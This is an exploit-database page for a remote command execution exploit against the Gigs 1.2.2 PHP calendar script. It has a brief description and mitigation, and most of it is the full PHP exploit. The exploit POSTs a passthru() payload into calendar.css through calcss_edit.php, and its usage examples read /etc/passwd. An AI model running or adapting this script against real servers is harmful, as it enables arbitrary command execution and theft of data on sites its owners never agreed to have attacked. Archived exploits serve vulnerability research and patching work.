2532|Gigs 1.2.2 Stable Remote Command Execution Exploit

vendor:

Gigs 1.2.2

by:

athos

9.3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: Gigs 1.2.2

Affected Version From: 1.2.2002

Affected Version To: 1.2.2002

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

2532|Gigs 1.2.2 Stable Remote Command Execution Exploit

2532|Gigs 1.2.2 Stable Remote Command Execution Exploit is an exploit that allows an attacker to execute arbitrary commands on a vulnerable system. The exploit works regardless of the php.ini settings. The exploit is triggered by sending a specially crafted POST request to the calcss_edit.php file. The POST request contains a payload that is written to the calendar.css file, which is then executed by the vulnerable system.

Mitigation:

The vulnerability can be mitigated by adding a check to the calcss_edit.php file to ensure that it is not being accessed directly. This can be done by adding an eregi() check to the beginning of the file.

Source

Exploit-DB raw data:

<?php


/* ----------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Command Execution Exploit
 * ----------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it 
 * works regardless php.ini settings
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ----------------------------------------------------------------
 * Code Details (calcss_edit.php)
 *  
 * 1. <?php
 * 2. ...
 * 12. sleep(2);
 * 13. $id = $_POST["id"];
 * 14. $content = $_POST["content"];
 * 15. //lets write the updated CSS file
 * 16. $filename = "css/calendar.css";
 * 17. $theText = stripslashes($content);
 * 18. $data = fopen($filename, "w");
 * 19. fwrite($data,$content);
 * 20. fclose($data);
 * 21. // display the new css file
 * 22. include("css/calendar.css");
 * 23 ?>
 * ----------------------------------------------------------------
 * Fix
 * 
 * <?php
 * 
 * if(eregi('calcss_edit.php',$_SERVER['PHP-SELF']))
 * {
 *      die("Access Not Allowed");
 * }
 * 
 * ...
 * ?>
 * 
 */



error_reporting(0);

$host = explode('/',$argv[1]);
$exec = $argv[2] or usage();


$sock = fsockopen($host[0],80);

$post = "content=<?php passthru('{$exec}');?>";
$leng = strlen($post);

$data = "POST /{$host[1]}/calcss_edit.php HTTP/1.1\r\n".
        "Host: {$host[0]}\r\n".
        "User-Agent: Lynx (textmode)\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Accept-Encoding: text/plain\r\n".
        "Content-Length: {$leng}\r\n\r\n{$post}\r\n\r\n";

fputs($sock,$data);

while(!feof($sock)) {
$html .= fgets($sock);
} fclose($sock);

echo $html; 



function usage() {


print_r('
-------------------------------------------------------
2532|Gigs 1.2.2 Stable Remote Command Execution Exploit
-------------------------------------------------------
by athos - staker[at]hotmail[dot]it
works regardless php.ini settings

Usage: php xpl.php [host/path] [command]
       php xpl.php localhost/cms cat ../../../etc/passwd
       php xpl.php localhost/cms "uname -a"
       
'); exit(0);



}


?>

# milw0rm.com [2008-12-18]